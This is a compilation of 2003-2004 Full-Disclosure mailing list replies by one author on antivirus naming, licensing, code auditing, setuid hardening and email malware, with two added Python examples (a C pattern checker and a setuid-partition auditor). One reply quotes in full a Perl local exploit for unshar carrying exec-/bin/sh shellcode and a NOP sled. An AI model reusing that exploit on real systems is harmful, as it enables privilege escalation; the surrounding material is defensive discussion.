Re: [Full-Disclosure] (no subject)

2004-08-09 Thread Todd Burroughs

> Isn't the complete lack of naming standardization in the AV industry
> simply amazing? Imagine that were the case in science, particular
> medicine...

No shit.  They should at least get together and come up with some common
naming convention.  They need to make some common "naming authority", it's
not difficult, we do it all the time with other software and as mentioned,
in all scientific disciplines.  Otherwise, things become very convoluted
for us in the know.  This is irrelevant to the general population,
but is necessary for the people who have to deal with these things.

How about it "AV guys"?  (I mean to be nice here...)

Todd

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] (no subject)

2004-08-13 Thread Todd Burroughs
> I can easily understand how someone unversed in the _market forces_
> pertaining to antivirus software could hold that position, and as a
> theoretical solution to the problem of lack of cross-vendor naming
> coordination it has often been suggested even by those who know it
> would never work in the real world.
>
> Neat and tidy as such a solution seems, it will not, however, work.  As
> I explained in other of my posts in this and the related "AV Naming
> Convention" thread, in general by far the largest "cost" of naming
> disagreement is borne by the users in the early hours of large-scale
> outbreaks.  Thus, a "solution" that specifically _requires_ all vendors
> to use a different name until a name is agreed (no matter what this
> process is, it will take some _additional_ time) is, by design, an _anti-
> solution_ as such a "solution", by design, ensures perfect naming
> inconsistency at the time the highest cost of naming inconsistency is
> borne.

Vendors should not "have to" use a different name until the "real"
one is determined, they should use whatever they want to.

You know what, I don't work in the "anti-virus" field, but what you are
saying is BS.  There is no good reason that I can think of that the AV
companies cannot rename these things after the fact.  When an outbreak
happens, they provide a fix and name it whatever they want.  After the
fact, they could rename things and their updates reflect the "proper"
name.  They can keep a reference to their name in the description, what's
a few more characters in the signature files for every piece of malware
going to matter? another 100k in a download at most?  I agree that there
is probably a lot of marketing pressure that may make this difficult,
but there is no technical reason for it.

The AV companies cannot be that lame that they cannot handle a simple
name change.  I mean we use databases and other things and using these
"computers" that should make this easy.  If thay are that lame, maybe
they shouldn't be in busines.

It's up to people like us that read lists like this to make them fix
this silly problem, or we can ignore it.  It doesn't affect me much,
it just seems silly that they cannot name things consistently.

> Secondly, one of the greatest impediments to ongoing (as opposed to
> initial, outbreak-phase) naming inconsistency is that many vendors do
> not have internal processes robust enough to easily handle renaming

This is a lame excuse at best, maybe these companies need to redesign
themselves, this should not be a big problem.

> (And please, before replying to this message, please, please, please,
> please, please read _all_ the rest of thread -- as the only person
> making a significant contribution who has more than half a clue about
> how all this stuff works, what may be technically feasible, and what a
> great deal of customer and industry history suggests may be acceptable,
> answering the same misconceptions over and over is getting tiresome...)

We'll be sure to bow down to you...

Todd



Re: [Full-Disclosure] Re: [ANNOUNCE] Python network security tools: Pcapy, Impacket, InlineEgg

2003-11-28 Thread Todd Burroughs
On Fri, 28 Nov 2003, Ng Pheng Siong wrote:

> On Fri, Nov 28, 2003 at 12:50:06AM +0100, Härnhammar, Ulf wrote:
> > [whatever]
> > That's an incorrect usage of the open source term. I quote the Open Source
> > Definition ( http://www.opensource.org/docs/definition.php ):
>
> The term "open source" has been understood to mean "comes with source code"
> long before people try to humpty-dumpty-tise it. Just like "free software"
> does not necessarily mean "GPL software".
>
> I happen to give away some open source (comes with source code) free
> software (comes with few restrictions). Personally I couldn't care less if
> it is "Open Source" or "Free Software".

I understand "Open Source" to mean that the source code is open for anyone
to use, without restrictions on commercial use.  Restrictions apply when
you want to redistribute it.

If something is "Open Source", I should be able to do what I want with
it, as long as I don't distribute it or binaries resulting from it.

The BSD license is Open Source, although you are not required to provide
your derived code to the community.  You do have to acknowledge them
if you distribute your code/binaries though.  You are free to do this,
with that minor restriction.

I think it's more about that fact that anyone is allowed to use the
"Open Source" code for almost any purpose, but may have restrictions on
redistributing it and derivations of it.

We use a product, where we get the source code to it.  We pay for this
and are free to modify the code as we see fit, but are *not* permitted to
redistribute that code.  It is not "Open Source", but it is not "Closed
Source" either.  One reason we picked this is that we can freely modify
the code for our own use, that is important to us.  We can make it work
with our system and can fix bugs ourselves, regardless of the vendor.

So, this is something in the middle.  We are free to modify and use
it, but cannot share it.  We get source code, which is very good and
much better than getting "binary only".  People who ship "source for
non-commercial use" are very close to "Open Source", but that is not
exactly "Open Source".  This is similar to shareware, but you get the
source code, much better I think.  If I had a product that I didn't want
to release as "Open Source", this might be a model I chose.  I hope people
can make money from it, they may get some "Open Source" type benefits.


Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.



RE: [Full-Disclosure] automated vulnerability testing

2003-11-29 Thread Todd Burroughs

>   Most of these are situations similar to the halting problem on a Turing
> machine so you are unlikely to get an error free checker. But if your
> checker complains about all the possible security holes, it will complain
> about nearly every construct used within C programs.

I'm auditing one of our daemons, written in C.  I've run it through
various source code checkers and that is useful, I found something that
could be exploitable using this.  In our environment, it is not a problem,
but we'll fix it and we all learn something.

These tools are useful to find obvious problems or problems that have
a pattern.  Now, after using these tools, I have to look over the code
and it cannot be code that I wrote.  I don't think there's a substitute
for serious code review.

If you want to make a better tool, please do, I'll use it and if it's
good, I might help...

Todd Burroughs

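The post above talks about source code checkers that find "obvious problems or problems that have a pattern" and then need a human to look over the results. Here is an added example of that kind of checker, written for this page and not one of the tools the post refers to; the C source it scans (SAMPLE_C) is constructed. It flags a few unbounded string functions by name, and tags the case where the source argument is a string literal, which is exactly the kind of hit a reviewer has to dismiss by hand:

```python
"""Pattern-based C source checker.

Added example, not one of the checkers the post refers to. It finds the
kind of "obvious problems or problems that have a pattern" such tools
report, and shows why review must follow: a call is flagged by name,
whether or not the arguments make it safe. SAMPLE_C is constructed."""
import re

# Constructed C source: one real overflow, one harmless call, one gets().
SAMPLE_C = r'''
#include <stdio.h>
#include <string.h>
void greet(const char *name) {
    char buf[32];
    strcpy(buf, name);              /* unbounded copy of caller data */
    printf("hello %s\n", buf);
}
void safe(const char *name) {
    char buf[32];
    strncpy(buf, name, sizeof buf - 1); buf[31] = 0;
    strcpy(buf, "hi");              /* literal that fits: a false positive */
}
int main(void) { char line[64]; gets(line); greet(line); return 0; }
'''

# Calls the checker complains about and why.
RISKY = {
    "gets": "reads input with no length bound",
    "strcpy": "copies with no length bound",
    "strcat": "appends with no length bound",
    "sprintf": "formats with no length bound",
}
CALL_RE = re.compile(r"\b(%s)\s*\(" % "|".join(RISKY))
# Matches the tail of a call whose second argument is a string literal.
LITERAL_SRC_RE = re.compile(r'^\s*[\w\[\].>-]+\s*,\s*"')


def strip_comments(src):
    """Blank out C comments while preserving line numbering."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), src, flags=re.S)
    return "\n".join(line.split("//", 1)[0] for line in src.splitlines())


def find_risky_calls(src):
    """Return [(line, func, reason, literal_source)] for each flagged call.

    literal_source is True when the source argument is a string literal,
    which a reviewer can usually dismiss after checking the buffer size."""
    hits = []
    for n, line in enumerate(strip_comments(src).splitlines(), 1):
        for m in CALL_RE.finditer(line):
            fn = m.group(1)
            literal = bool(LITERAL_SRC_RE.match(line[m.end():]))
            hits.append((n, fn, RISKY[fn], literal))
    return hits


def report(src):
    """Human-readable lines, one per hit."""
    return ["line %d: %s() %s%s" % (n, fn, why, " [literal source, verify size]" if lit else "")
            for n, fn, why, lit in find_risky_calls(src)]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_C)))
```

On the sample it reports three hits: the strcpy() of caller data on line 6 (a real finding), the strcpy() of a literal on line 12 (tagged for the reviewer to dismiss), and the gets() on line 14. Nothing here understands buffer sizes or data flow, which is the point the post makes: the tool narrows where to look, the review still has to be done.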


Re: [Full-Disclosure] automated vulnerability testing

2003-11-29 Thread Todd Burroughs
> Bill Royds wrote:
> > If you are truly interested in security, you won't use C as the
> > programming language.

Probably, the language is written in C...

Ultimately it's all machine language and we can hide things in "higher
level" languages but it comes down to the fact thet we end up playing
with pointers and we aren't very good at it ;-)

Todd Burroughs



Re: [Full-Disclosure] flames security group start to play , yet another vuln found (rustymemory and welshboi)

2003-12-04 Thread Todd Burroughs
This has to be a troll, I mean if I made /bin/sh SUID root and gave you
a shell, you could probably get root on my system.

You shouldn't have much on your system that is SUID root.  I have no
idea why someone would even think that unshar would be set this way.
If you use SuSE, set security to "paranoid" and it does a decent job,
after that you will need to add whatever you need to the security.local
file, depending on what you use the system for.

I know I'm biting on this, but it does underscore the fact that you should
"unsuid" anything that is not really needed on your system.

I make a small partition and mount everything else "nosuid".  I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be.  This makes it easy to find SUID programs,
run mount and make sure things are mounted nosuid, then look at your
"suid partition".

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 3 Dec 2003, KF wrote:

> if you are bored  download unrar.
> -KF
>
>
> rustymemory wrote:
>
> >By: flames.bluefox.net.nz
> >if unshar suid; then you w00t
> >
> >proof of concept?
> >
> >[EMAIL PROTECTED]:~$ unshar -f `perl -e 'print"A"x2000'`
> >AASegmentation fault
> >
> >[EMAIL PROTECTED]:~$ more unshar.pl
> >#!/usr/bin/perl
> >#/usr/bin/unshar local sploit.
> >#coded by welshboi (deadbeat)
> >#found by rustymemory
> >#
> >#FLAMES SECURITY GROUP
> >#Private, please dont distribute
> >#affects all linux distributions , tested on slackware 9.1 and MDK
> >###
> >[EMAIL PROTECTED] sploits]$ perl unshar.pl #
> ># #
> >#[] /usr/bin/unshar exploit #
> >#[] coded by: deadbeat [] #
> >#[] found by: rustymemory [] #
> >#_f1GWugHu[SPZ #
> ># #
> >#sh-2.05b$ #
> >###
> ># 47byte shellcode (exec /bin/sh)
> >$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
> >"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
> >"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
> >"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
> >$egg = 2000;
> >$buf = 1128;
> >$nop = "\x90";
> >$offset = 0;
> >$ret =0x40055bdc;
> >if(@ARGV == 1) {$offset = $ARGV[0];}
> >$addr = pack('l', ($ret + $offset));
> >for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
> >for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
> >$evil .= $hell;
> >print "\n[] /usr/bin/unshar exploit []\n";
> >print "[] coded by: deadbeat, uk2sec []\n";
> >print "[] found by: rustymemory []\n\n";
> >print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
> >system("/usr/bin/unshar -f $evil");
> >
> >-
> >shouts to ?
> >
> >calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest
> >of flames security group. and rusty's fiancee
> >
> >
> >
> >
>
>
>



[Full-Disclosure] Partial Solution to SUID Problems

2003-12-04 Thread Todd Burroughs
Several exploits rely on being able to create suid programs or
to execute these programs (maybe installed by an old patch, etc.)

I have an idea to reduce this problem.  Basically, you mount everything
"nosuid", except for one filesystem.  This filesystem is obviously only
writeable by root, it gets rid of the linking problem discussed last week.

I make a small partition and mount everything else "nosuid".  I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be.  This makes it easy to find SUID programs,
run mount and make sure things are mounted nosuid, then look at your
"suid partition".

So, does this make sense?  It seems to make it easier and more controlled
when you patch or add suid binaries.  I would love to see us start to
use something like this on *NIX systems.


Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.



Re: [Full-Disclosure] Partial Solution to SUID Problems

2003-12-06 Thread Todd Burroughs
On Fri, 5 Dec 2003, Ciro wrote:

> On Thu, 4 Dec 2003, Gino Thomas wrote:
> >
> > I asked some ppl the same question, answers vary. On one hand some ppl
> > trust the suids and claim that messing up with them will open new
> > problems and that there are also many other ways to get root (kernel,
> > libc, daemons,...) on the other hand ppl agreed with me that if i don't

If, by "messing up with them", you mean "turning off the suid bit", that
cannot decrease security.  If they think otherwise, they do not know
what they talk about.  Any program that is suid or sgid can either do
nothing for or decrease your security.  I cannot think of any possible
way that keeping suid/sgid could increase your security.  There are some
exceptions if you want to give people partial root access, like 'sudo'.

I'm open to suggestions otherwise, but doubt anyone would disagree.

> The thing that screams "bad idea" or at least "inconvenient pain in the
> neck" to me is that, on the off chance that a wide-spread exploit is
> found and you have to "make world" or whatever, it puts them right back
> and you have to do it again.

I was going to mention this, it is a "bit" of a pain when you replace
something and it gets put back "where it belongs".  I've broken 'su'
on our systems before when it got updated.  One of our programmers was
pissed because she thought I cut her off root ;-)

Another problem that you *must* be aware of is that if you do something
like an 'rpm' update ('make world' would likely do the same), it may
update things where they are supposed to be and they won't be suid, but
you still have your vulnerable suid program that is actually suid on the
"suid partition".  It'll generally break things and you'll notice though.
If the distros did this, you wouldn't have to worry about it.  I find
that the convenience of being able to look at the actual suid programs
by doing "mount; ls -l /suid_stuff" outweighs this.  It's annoying at
update time though...

For the most part, you shouldn't need all those suid programs anyway.
Most boxes I administer have 'su' and 'sendmail' (sgid).

On a workstation, I usually don't bother with this, but on a server I think
it helps.  It *is* a pain when I update the programs I want s[ug]id, as I
have to manually fix this.  It's nice that the ones that might get installed
by updates or other admins doing things will not actually be s[ug]id, unless
they put them on the "suid partition".

This does not protect you against being rooted, but I find that it does
make it easier to monitor and control.  Many of the libc and other
exploits require that you run a suid program, this makes it easier to
control which ones actually work.

When you have a lot of servers and admins of various skill and security
knowledge (if you know anything about security, you know how hard it is
for people to understand even simple security), I've found this very
helpful in controlling what programs are actually s[ug]id on my servers.

The latest Linux kernel thing is nasty, I've spent the week making
kernels, rebooting and finding/fixing minor problems unrelated to
security...  Security against this: don't give shell access, if you
host websites, CGI, PHP, etc. etc., keep suids away from people and fix
things fast.  Our web servers get patched real quick ;-)

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

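The "suid partition" scheme from the original proposal and the update problem described in the reply above (a package update puts a setuid copy back at the canonical path while the old one still sits on the suid partition) can both be checked mechanically. What follows is an added example written for this page, not code from the posts: it takes a mount table in Linux /proc/mounts form plus a list of (path, mode, symlink target) entries, and reports which s[ug]id files are where they belong, which are inert because their mount is nosuid, which are live on a mount that is not nosuid, and which are orphans on the suid partition that nothing links to any more. SAMPLE_MOUNTS, SAMPLE_FILES and the /suid_stuff mountpoint are constructed; scan_live() builds real entries from the running system.

```python
"""Audit the "one suid partition, everything else nosuid" layout.

Added example, not code from the original posts. It checks the scheme
described above: every s[ug]id file should live on the suid partition
and be reached through a symlink, while the kernel ignores the bit on
nosuid mounts. The mount table and file entries are constructed sample
data in Linux /proc/mounts form; scan_live() builds real entries.
"""
import os
import stat

# Constructed mount table: /home deliberately lacks nosuid.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,nosuid 0 0
/dev/sda2 /usr ext3 rw,nosuid,nodev 0 0
/dev/sda3 /suid_stuff ext3 rw,nodev 0 0
/dev/sda4 /home ext3 rw 0 0
none /proc proc rw 0 0
"""

# Constructed entries: (path, st_mode from lstat, symlink target or None).
SAMPLE_FILES = [
    ("/suid_stuff/su", 0o104755, None),
    ("/suid_stuff/sendmail", 0o102755, None),
    ("/suid_stuff/passwd", 0o104755, None),          # stale: nothing links here any more
    ("/bin/su", 0o120777, "/suid_stuff/su"),
    ("/usr/sbin/sendmail", 0o120777, "/suid_stuff/sendmail"),
    ("/usr/bin/passwd", 0o104755, None),             # package update put a setuid copy back
    ("/home/web/cgi-bin/helper", 0o104755, None),    # stray setuid file on a live mount
    ("/bin/ls", 0o100755, None),
]


def parse_mounts(text):
    """Map mountpoint -> set of mount options from /proc/mounts-style text."""
    mounts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4:
            mounts[parts[1]] = set(parts[3].split(","))
    return mounts


def mount_for(path, mounts):
    """Longest mountpoint that is a prefix of path."""
    best = "/"
    for mp in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if len(mp) > len(best):
                best = mp
    return best


def is_sugid(mode):
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def audit(files, mounts, suid_mount="/suid_stuff"):
    """Return (ok, flagged): ok are s[ug]id files on the suid partition that
    a symlink points to; flagged pairs (path, reason) for everything else."""
    linked = {target for _, mode, target in files if stat.S_ISLNK(mode) and target}
    ok, flagged = [], []
    for path, mode, _ in files:
        if stat.S_ISLNK(mode) or not is_sugid(mode):
            continue
        mp = mount_for(path, mounts)
        if mp == suid_mount:
            if path in linked:
                ok.append(path)
            else:
                flagged.append((path, "orphan: nothing links to it, probably replaced by an update"))
        elif "nosuid" in mounts.get(mp, set()):
            flagged.append((path, "inert: %s is nosuid, but clear the bit anyway" % mp))
        else:
            flagged.append((path, "LIVE: %s is not mounted nosuid" % mp))
    return ok, flagged


def scan_live(root="/"):
    """Walk the real filesystem into (path, mode, target) entries for audit()."""
    entries = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            target = None
            if stat.S_ISLNK(st.st_mode):
                target = os.path.normpath(os.path.join(dirpath, os.readlink(p)))
            entries.append((p, st.st_mode, target))
    return entries


if __name__ == "__main__":
    ok, flagged = audit(SAMPLE_FILES, parse_mounts(SAMPLE_MOUNTS))
    print("on the suid partition:", ok)
    for path, why in flagged:
        print("flagged:", path, "-", why)
```

To run it against a real box, read /proc/mounts into parse_mounts() and pass scan_live() to audit(). The three flagged cases in the sample are the three things the posts say go wrong: the stale copy on the suid partition, the copy an update put back where it "belongs" (harmless while that filesystem stays nosuid, which is why the nosuid mount is checked rather than assumed), and a setuid file that ended up on a filesystem nobody remembered to mount nosuid.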


Re: [Full-Disclosure] Partial Solution to SUID Problems

2003-12-06 Thread Todd Burroughs

> please explain how a user should be able to change his password
> without a setuid passwd. write access to /etc/spwd.db and pwd.db for
> everybody...?

On a box that has user access, you would need more things suid.
I mostly administer web servers and a lot of other servers that people
have no need to really interact with.  They change passwords, etc.
through a web application and it has nothing to do with the actual
server.

On a server that you have shell access, you probably really need to add
'passwd' to the 'suid partition'.  You may need some other things,
on some of our servers, I have 'ping' as well.

As I said, this gives you some control and, regardless if you do this,
you should have the minimum number of s[ug]id programs to make your
system functional.  Start with 'su' and 'sendmail' for a server, for
a workstation, you'll probably need a couple to run X properly and
probably some for convenience.

Todd



Re: [Full-Disclosure] Partial Solution to SUID Problems

2003-12-06 Thread Todd Burroughs
On Sat, 6 Dec 2003, Paul Szabo wrote:

> Sorry, but I have a counter-example (and admit that I was bitten by it):
> pt_chown (or chgpt or slvmod or whatever). Some OSs use something like
> that to chown or chmod the pty they just allocated. Turning the suid bit
> off prevents your pty from being owned by you so you cannot set safe
> permissions, and are vulnerable to "echo badcommand > yourpty".

This is a good point.  I'm mostly used to web servers and other machines
with no users.  On the web systems, we allow wide open CGIs, etc., so
it's essentially the same as having a shell (no tty though).  We have
some controls in place and otherwise, have fun and we'll delete you if
you're bad.

I'll keep this in mind, we're planning to make a shell server for
customers to play on ;-)  I quite likely would have missed this, except
that we're messing with the kernel and I'm not sure if we got that one...

Todd



Re: [Full-Disclosure] Partial Solution to SUID Problems

2003-12-07 Thread Todd Burroughs
> Sometimes, old and silly rules aren't just about security.
>
> The *real* reason for the "always su from a user account" rule isn't to stop
> exploits.  It's so you have an audit trail of who did what.

This is exactly why I need su.  We have about 20 people with root access,
only about 8 or 10 that regularly change things.  You need an audit trail,
we all make mistakes and it's a lot easier and faster (really important
on a production system) if you find out who did it and talk to them.

If you only have a couple admins, direct root logins should work fine.
It's still nice to know what user logged in, if that account is
compromised, at least you know.  With root logins, you don't know who
is logging in.

I agree that it doesn't add much in the way of security, but I've found
that most problems are caused by the admins.  I know I've done my share
and I've gotten that call saying "what the f*** did you just do to ns2?".
(Usually, I fix things I break before anyone notices though ;-)

Also, I haven't looked at the source for su, but it *should* be a fairly
simple program and therefore easier to secure.  (compare to X, kernel, etc.)

Todd



RE: [Full-Disclosure] Is the FBI using email Web bugs?

2004-01-08 Thread Todd Burroughs
> Can we blow off the FUD on images embedded in HTML mails? Whenever I see
> the term "Web Bug" used I know that I will have to find factual
> information on the subject discussed from another source.

Thank you.

I was wondering what "Web Bug" was, got figuring that it was simply
clicking (or automatically clicking) on a link.

This is not a "bug", if you click on a link, you send certain info
to that site, at the least, your IP address (or your proxy's).

Can we drop this now, yes, people can trace people who use email clients
which automatically send information to a server.

This is not infosec, it's about educating users and admins.  Maybe we
need another list regarding things like this.

Todd Burroughs



RE: [Full-Disclosure] Is the FBI using email Web bugs?

2004-01-09 Thread Todd Burroughs
On Thu, 8 Jan 2004, Gary E. Miller wrote:

> Yo Todd!
>
> On Thu, 8 Jan 2004, Todd Burroughs wrote:
>
> > I was wondering what "Web Bug" was, got figuring that it was simply
> > clicking (or automatically clicking) on a link.
>
> A web bug can be much more than that.  When you read an HTML email or
> web page your workstation can send back gobs of information about you.

I didn't explain myself.  I probably shouldn't being sending this,
as it is noise on the list but I can't resist...

This "web bug" (fucking marketing people, that's where this name came
from) thing is obvious and has existed for a while.  (like since they
invented the Internet...)  (and don't tell me how it is different now,
the concept has been there all along)

As I mentioned, if you send information to a server, do not expect
that that information will not be used.  I said that at a *minimum*,
they would get your IP address.  Obviously, they will get much more.

The whole situation boils down to: if you send *any* server *any*
information, they can use it as they want.

READ THIS MS USERS
If you use mail clients that send information (I mean anything) back to
a server without your express consent, DO NOT EXPECT PRIVACY.  This is
the way the Internet works.  BTW, this is not exclusive to MS users.

I work in the hosting business, we harvest info from web logs to determine
a lot of things.  If I wanted to be malicious, I could easily and trivially
do a lot more.

I'm bitching about the length of this thread, not that someone started
it, we need to be open about everything, but if it becomes useless,
it needs to be moved to private email, etc.

Todd



Re: [Full-Disclosure] hello

2004-01-26 Thread Todd Burroughs
This is an unmoderated list.  Whatever you or anyone on the list
(including a trojan clicked on by, ummm, a Windows user) gets sent.

I think it's quite amusing, at least we haven't seen a flood of them,
sort of says something about the people on the list.

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Tue, 27 Jan 2004, Gregh wrote:

>
> - Original Message -
> From: <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, January 27, 2004 1:32 PM
> Subject: [Full-Disclosure] hello
>
>
>
> .would there be a reason the list resends a worm like this?
> Mydoom isn't exactly what I wanted.
>
> Just out of interest, I realise many people want to receive
> viruses/worms/trojans so would this be the reason? I don't mind if that is
> the case. I was surprised to see it there but not uninformed, at least.
>
> Greg.
>
>



RE: [Full-Disclosure] MyDoom.b samples taken down

2004-02-02 Thread Todd Burroughs
I think it is purely social engineering, there is nothing special about
this malware, it is pretty common now.  What it seems to have done
different is that it made Windows users see an icon that looked like a
text file, one that they have been trained to accept as "safe".

I think that there's a good possibility that this is run by organized
crime for spam purposes or maybe worse.  I really hope that someone
from Microsoft follows this list and realizes the danger of allowing
this situation to go on.

Users can be trained to have to save a file to disk before running it,
this would remove most of this problem and people who actually use email
to send executable files would get used to it pretty quickly.

One can only hope...

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Mon, 2 Feb 2004, Dowling, Gabrielle wrote:

> Bill
>
> You make some good points, but as to your comment that "Mydoom.B was not
> as successful as mMydoom.A because people had already been warned about
> clicking on messages with that format. It has nothing to do with the
> lethality of the virus. What makes a virus dangerous today is much less
> the actual virus code (as Nick says there are very much alike), but the
> social engineering of the message and the smarts about where it gets the
> email addresses to propagate"...
>
> I don't think there's any way you can support your conjecture of the
> success of A over B.  I haven't checked since Friday evening, but before
> then I didn't see the volume of messages received at our gateway
> diminish, which pretty strongly indicates that either a) we've got the
> same base infection rate as when it first hit (and therefore, systems
> that got hit don't know that they got hit, and aren't aware that they
> might have been hit and thus haven't been reading anything about how
> they should deal with this specific message if it comes in,and therefore
> are likely to click on Mydoom.B if they received it) , or b) new systems
> are getting infected as soon as existing systems are getting cleaned up.
> While I don't think educational efforts are fruitless (and in fact far
> from it, I think the fact that they have simply been inadequate), I
> don't think there's any reason to think that anyone has "learned" about
> this one and thus abstains.  I know quite definitively that when the
> "FriendGreetings" malware was circulating a couple of years ago, we had
> users continue to click on links (despite it having exactly the same
> message format) as each new linked site was added, despite clear
> information that was sent to them immediately upon the first site
> becoming known.
>
> What no one here seems to be interested in how this thing got so big, so
> fast, and its apparent kinship in that respect to its Sobig predecessor
> (in terms of volume, and probably also in terms of ultimate goal).  It
> seems an important thing for this forum to consider, yet no one has
> (other than to assume that there is something special about the code,
> which there is not).
>
> G
>
>
> **
> This e-mail is sent by a law firm and contains information
> that may be privileged and confidential. If you are not the
> intended recipient, please delete the e-mail and notify us
> immediately.
> ***
>
>



Re: [Full-Disclosure] Has anyone seen this in their e-mail

2004-03-08 Thread Todd Burroughs
This is the standard Symantec CarrierScan message when it finds a virus.

I get lots of viruses in my email daily, there's not much point in posting
ones that get caught to the list.  Don't take this the wrong way, but this
is just an example of the common shyte flying around the Internet today.

Todd Burroughs


On Mon, 8 Mar 2004, Edward W. Ray wrote:

> ALERT!!!
> This e-mail contained one or more infected files.
> The following attachments were infected and have been repaired:
>
> No attachments are in this category.
>
> The following infected attachments were deleted:
>
> 1. Attach.zip: [EMAIL PROTECTED]
>
> You may wish to contact the sender to inform them about their infections.
>
> This email was scanned and cleaned by Symantec AntiVirus.
>
>  Original message text follows 
>
>
>  This e-mail was addressed to my mail server.  It even looked authentic, but
> since my mail server never sends me zip attachments I thought it strange.
>
> Please be careful when opening.  The zip file contains an executable, and I
> would assume it is some kind of virus or worm.
>
> Has anyone else seen something similar?
>
> Regards,
>
> Edward W. Ray
>
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Sent: Thursday, March 04, 2004 12:33 AM
> To: [EMAIL PROTECTED]
> Subject: Email account utilization warning.
>
> Dear  user of Mmicman.com e-mail server  gateway,
>
> Your e-mail account will be disabled because of  improper using in next
> three days,  if you  are  still wishing to use it, please,  resign your
> account information.
>
> Advanced details can be found in attached file.
>
> For security reasons attached file is  password protected. The  password is
> "73531".
>
> Best wishes,
> The  Mmicman.com teamhttp://www.mmicman.com
>



[Full-Disclosure] Operating Systems Security, "Microsoft Security, baby steps"

2004-03-18 Thread Todd Burroughs
Here's a good example.  Yesterday, a problem was resolved with OpenSSL.
This package is used in a *lot* of software (yes, including *BSD ;-).

SuSE had patches out the fastest, within hours of the official release.
Over the course of the day, I saw most/all of the major open source OS
vendors (Linux and BSD) announce patches to this problem.

I know that other major software companies use OpenSSL in their products;
the "free/open source" software community responds very quickly, much
faster than any commercial vendor (I noticed that Cisco released
a patch).  This is proof, same day fix vs. fix in a few months.

Updating any OS is a pain in the ass, but all of them have flaws and
need to be updated.  I find that at least with the UNIX-like ones,
you can go on the Net and do your updates faster than you get rooted.
MS really needs to fix this, they need to make it so that mom and pop
can install and do updates without getting taken over.

Kudos to SuSE, keep up the good work!  We're getting nervous with the
Novell thing, but keep security first.  One thing, we need a basic
install, no X, just a base install that is secure.

One thing to note, I've updated a lot of SuSE based servers and had no
problem, but would rather wait a bit than have problems if the vendor
didn't have the resources to test things first and the problem is
supposed to be limited to a DOS (as opposed to remote root).

Todd Burroughs



RE: [Full-Disclosure] Operating Systems Security, "Microsoft Security, baby steps"

2004-03-18 Thread Todd Burroughs



On Thu, 18 Mar 2004, Schmehl, Paul L wrote:

> > Updating any OS is a pain in the ass, but all of them have
> > flaws and need to be updated.  I find that at least with the
> > UNIX-like ones, you can go on the Net and do your updates
> > faster than you get rooted.
>
> This is foolish thinking.  Do you really think that, when a patch comes
> out, *then* the hackers start working on exploits?  The exploits were
> being used *long* before the patch comes out.  The only thing a patch
> gets you is protection against *future* hack attempts against *that*
> weakness.

Wasn't that something that MS tried to say, the "hackers" are reverse
engineering our patches?  That was funny, but the sad thing is that a
lot of people will believe it.

What I meant is that you can most likely actually use the Internet to get
patches with a fresh install before you get taken over, not that somehow
UNIX-like systems make patches before the exploits are out there and being
used ;-)  It's quite apparent by other threads on the list that this is
not generally the case with Windows.  Just being patched doesn't mean
that you are safe, but it's better than running well known security holes.

Obviously, if you go on the Net with all services running, especially
on an unpatched box, you're gonna get rooted pretty quickly.

Todd Burroughs



Re: [Full-Disclosure] viruses being sent to this list

2004-03-22 Thread Todd Burroughs

On Tue, 23 Mar 2004, Gadi Evron wrote:

> | However, the mailing list has become, in a growing trend, a means by
> | which people transfer viruses, whether it is their intention or if they
> | got "0wned" is irrelevant, distributing malware is illegal, and should
> | be dealt with by the list owners.
>
> I stand by it being irresponsible, and I do believe it is illegal,
> however, laws in different countries vary, so as I can not cite any
> ruling at the moment, I'd rather take the "illegal" part back until I
> can cite something.

I think that this depends on how you view the list.  I think of it as
simply a distribution mechanism.  We could just as easily use Usenet or
something web based.  I know that I am not responsible for content that
is propagated via my news servers, if I was, they'd be shut down right
away.

If this was a moderated list, I could see the moderator being responsible,
at least to some extent, on the content.

As for the viruses being propagated via the list, I don't think the people
who run the list are responsible, as this is simply a distribution system.
I guess they could run a virus scan on mail going through the list, if that
is what people want.


Todd Burroughs



RE: [Full-Disclosure] viruses being sent to this list

2004-03-24 Thread Todd Burroughs
On Wed, 24 Mar 2004, Steve Wray wrote:

> Actually, I am really glad of this thread.
>
> Its evidence that something between me and the list
> is filtering out viruses.
>
> My ISP *swears* that it isn't them.

I'm all for an *open* network, I want raw Internet.  If my ISP starts
"filtering" things for me, I'd probably switch ISPs.  They can offer it to
me, but I want a choice.  They can default it "on", but I want a choice
to turn it off.

I don't use Windows but if I did, I would find a safer mail client and
not click on stupid things.  I like getting viruses, I have to ensure
that our virus scan system works, so it's nice that I get 5 to 10 of
